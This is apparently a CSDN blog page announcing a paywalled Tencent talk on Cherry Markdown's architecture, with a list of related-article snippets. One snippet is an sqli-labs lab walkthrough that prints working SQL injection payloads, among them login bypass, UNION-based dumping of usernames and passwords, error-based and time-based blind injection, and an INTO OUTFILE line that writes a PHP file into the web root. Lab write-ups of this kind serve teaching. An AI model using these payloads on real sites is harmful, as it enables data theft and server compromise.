进阶研学大咖说10期 |胡杰雄《Cherry Markdown的底层设计思路和共建实践》

最新推荐文章于 2025-03-15 08:04:08 发布
最新推荐文章于 2025-03-15 08:04:08 发布
阅读量566 收藏 1
点赞数
文章标签: 腾讯 内核 编程语言 java 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tencent__open/article/details/126684641
版权
本文邀请了胡杰雄分享Cherry Markdown的底层设计思路和共建实践,涵盖项目简介、内核引擎层的设计目标与机制、基础架构层的性能挑战以及应用适配层的用户功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

7b03fbbf075b20df8893657ac8c98346.png

.

开源无边界,分享有价值

Code is not cold

腾讯犀牛鸟开源人才培养计划

「进阶研学大咖说」栏目

将陆续邀请众多开源大咖做客

一起分享和交流开源道路中成长心得

以知识和分享为起点

传承开源的璀璨星光

共创开源、多元、包容的新时代

60d4d836ab48eca2e32419aea6eba847.png

分享嘉宾介绍

fa9744d83eec187cd9dab5ce6708449e.jpeg

以下为精彩分享片段

Part.1 Cherry Markdown项目知多少

什么是Cherry Markdown项目?

这个项目内部具体是什么样子的呢?

整体发展历程

最低0.47元/天 解锁文章
tencent__open
关注
vue2.x中使用cherry-markdown
star7783620的博客
10-21 2038
vue2.x实现cherry-markdown用法
vue3中使用cherry-markdown
码农键盘上的梦
05-13 1716
cherry-markdown官网及api使用示例考虑到复用性,我在插件的基础上做了二次封装,步骤如下:1.下载 (,否则会报错:如果需要开启mermaid画图、表格自动转图表功能,需要同时添加mermaid与echarts包。目前推荐的插件版本为基础应用代码示例。
推荐强Markdown编辑器:Cherry Markdown
gitblog_00086的博客
03-22 1601
推荐强Markdown编辑器:Cherry Markdown 项目地址:https://gitcode.com/gh_mirrors/ch/cherry-markdown 项目简介 是由腾讯推出的一款开源、轻量级且高度自定义的在线Markdown编辑器。该项目旨在提供一个高效、易用且功能丰富的平台,帮助开发者写作爱好者提升编写Markdown文档的体验。 技术分析 基于Web技术 Cherr...
零依赖+1秒渲染!腾讯开源的Cherry Markdown编辑器惊呆开发者:让创作效率提升300%
最新发布
dotNET跨平台
03-15 999
以“轻量级内核+高扩展性”的组合拳,正在颠覆传统Markdown工具生态。:支持视频/音频插入、图片缩放对齐、字体颜色/背景色标注,告别“Markdown只能写纯文本”的刻板印象;:内置ECharts引擎,输入表格数据即可生成柱状图、折线图,数据分析无需切换工具;:原生兼容LaTeX、Mermaid语法,技术文档与术写作无缝衔接。:仅更新修改区域,相比全量渲染提速70%,万行文档编辑如丝般顺滑;:GitHub风格预览+多端同步,成为开发者文档标配工具。,成为技术文档、博客创作、在线教育的效率加速器。
探索极致的Markdown编辑体验:Cherry Markdown Editor
gitblog_00062的博客
10-10 1226
探索极致的Markdown编辑体验:Cherry Markdown Editor cherry-markdown ✨ A Markdown Editor 项目地址: https://gitcode.com/gh_mirrors/c...
Cherry Markdown 使用指南
gitblog_00264的博客
10-11 833
Cherry Markdown 使用指南 cherry-markdown ✨ A Markdown Editor 项目地址: https://gitcode.com/gh_mirrors/ch/cherry-markdown ...
毕业设计(论文)--零件的三维建模及自动编程(内附中英文翻译).doc
07-08
毕业设计要求生独立承担一部分比较完整的工程技术设计任务,发挥主观能动性、积极性创造性,在毕业设计中着重培养独立工作能力分析解决问题的能力,严谨踏实的工作作风,理论联系实际,以严谨认真的科态度,...
古田溪一级水电站设计洪水复核:1959年后的新数据与可靠性
作者李杰雄、文生王祥三分别来自珠江水利委员会科究所武汉水利水电院,他们的究旨在确保水电站设计洪水的准确性与可靠性。 首先,文章详细探讨了入库洪水的计算方法,这是设计洪水复核的核心部分,...
数控机床监控系统:可扩展性设计与实现
"该文主要讨论了一种具有高度可扩展性的监控系统的设计,特别是针对数控机床的监控。文章强调了系统可扩展性的重要性,并指出现有的商业监控软件在这一方面的局限性。作者通过创建一个以真实车间布局为基础的监控...
Windows服务驱动的数控机床群数据中转软件设计与实现
论文作者在导师丁杰雄教授的指导下,不仅探讨了技术实现,还强调了软件的创新性独创性,确保了所有引用合作成果都得到了适当的标注致谢。 在论文提交管理方面,作者遵循了校的规定,同意论文被查阅、借阅...
Vue 中 cherry-markdown 组件的使用
qzonemen
08-10 2065
1、这里将原插件提供的目录做了设计优化,更加美观点; 2、实现了截图粘贴自动上传功能;
cherry-markdown开源markdown组件详细使用教程
每个人都是独一无二的,把握好自己的节奏,跟着自己的心走。
10-05 3389
cherry-markdown开源markdown组件详细使用教程
Cherry Markdown 编辑器使用教程
gitblog_00808的博客
10-11 1326
Cherry Markdown 编辑器使用教程 cherry-markdown ✨ A Markdown Editor 项目地址: https://gitcode.com/gh_mirrors/ch/cherry-markdown...
cherry-markdown展示悬浮目录toc
weixin_73480865的博客
03-10 1224
/ 定义选中文字时弹出的“悬浮工具栏”,默认为 ['bold', 'italic', 'underline', 'strikethrough', 'sub', 'sup', 'quote', '|', 'size', 'color']// 定义光标出现在行首位置时出现的“提示工具栏”,默认为 ['h1', 'h2', 'h3', '|', 'checklist', 'quote', 'table', 'code']updateLocationHash: true, // 要不要更新URL的hash。
开源公告 | CherryMarkdown-更友好的编辑器前端组件
腾讯开源
10-28 1391
导语作为一种轻量便捷的文本标记语言,Markdown已在互联网等行业得到广泛的应用。Markdown语法没有强制统一的标准,不同平台使用的Markdown编辑器在语法功能特性上都各有差异...
开源04|刘阳、胡杰雄、魏林贤、崔家维——CherryMarkdown创始团队
腾讯开源
09-18 199
#自我介绍请您做一个简单的自我介绍。CherryMarkdown创始团队:家好,我们是CherryMarkdown项目的创始成员——sunson、barry、ivor、kirito,在参与CherryMarkdown项目之外,我们也分别参与了腾讯TAPD、工蜂、KM/乐享等产品的前端开发工作。您最初接触开源是基于怎样的机缘,有值得分享的趣闻轶事吗?CherryMarkdown创始团队:我们接触...
vue3中使用cherry-markDown步骤
SunFlower914的博客
05-18 4585
在vue3中对cherry-markdown做二次封装,提供上传图片、上传视频、上传音频、上传附件、默认预览模式等功能
cherry-markdown公式能插入但是预览无效
qq_33183172的博客
05-15 676
cherry-markdown公式能插入,但是预览无效的问题解决
sqli-labs1-7通关
01-01
### SQLi-Labs 1-7 关卡解题思路 #### Less-1: 基础 GET 请求注入 在这一关中,目标是在 URL 参数 `id` 中注入 SQL 语句来获取数据库中的信息。通过输入 `' OR '1'='1` 可以绕过身份验证并登录成功[^1]。 ```sql ?id=1' or '1'='1 ``` #### Less-2: 使用 UNION SELECT 注入 此关涉及使用 `UNION SELECT` 来联合查询其他表的内容。为了找到合适的列数,可以逐个增加返回的结果集数量直到页面不再报错为止。一旦确定了正确的列数,则可以通过这些列读取任意表格的信息[^3]。 ```sql ?id=-1 UNION ALL SELECT NULL,NULL FROM information_schema.tables WHERE table_schema=database()# ``` #### Less-3: 报错注入 利用 MySQL 的内置函数如 `extractvalue()` 或者 `updatexml()` 实现基于错误回显的 SQL 注入攻击。这允许直接从服务器响应中提取敏感数据而无需额外请求。 ```sql ?uname=1' AND extractvalue(1,concat(0x7e,(SELECT database())))--+&passwd=1&submit=Submit ``` #### Less-4: 时间盲注 当无法看到具体的错误消息时,可采用时间延迟技术来进行推测性的注入测试。例如,如果存在漏洞则会使查询等待一段时间再继续执行。 ```sql ?id=1' AND IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),NULL)--+ ``` #### Less-5: 基于布尔条件的时间盲注 进一步扩展上一关的概念,在不知道确切版本号的情况下也可以利用布尔表达式的真假判断配合 SLEEP 函数完成注入操作[^2]。 ```sql ?id=1' AND (IF((ASCII(SUBSTRING(version(),1,1)))>50,BENCHMARK(5000000,SHA1('A')),false))--+ ``` #### Less-6: 多参数注入 本关考察如何处理多个输入字段的同时注入问题。通常情况下只需要在一个地方构造恶意负载即可影响整个查询逻辑[^4]。 ```sql ?id=-1' UNION SELECT 1,GROUP_CONCAT(username,0x7E,password) FROM users # ``` #### Less-7: 文件写入与读取 最后一关涉及到更高级别的功能——将查询结果保存成文件并通过 Web 访问路径下载下来查看具体内容。这一步骤可能需要用到 INTO OUTFILE 子句以及 LOAD_FILE() 函数实现本地文件系统的交互。 ```sql ?id=1' union all select null,'<?php phpinfo(); ?>' into outfile '/var/www/html/shell.php'# ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值